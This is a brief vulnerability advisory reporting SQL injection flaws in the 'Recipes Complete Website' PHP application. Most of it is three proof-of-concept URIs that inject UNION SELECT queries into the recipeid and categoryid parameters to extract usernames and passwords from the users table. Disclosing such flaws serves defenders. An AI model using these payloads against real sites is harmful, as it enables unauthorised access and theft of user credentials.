Recipes Complete Website SQL Injection Vulnerabilities

Recipes Complete Website SQL Injection Vulnerabilities

An attacker can exploit these issues via a web client.

The following URIs demonstrate these issues:

http://www.example.com/[path]/recipe.php?recipeid=-1%20UNION%20SELECT%20login,password,0,0,0,0%20FROM%20users%20/*
http://www.example.com/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,login,0,0%20FROM%20users%20/* - login
http://www.example.com/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,password,0,0%20FROM%20users%20/* - password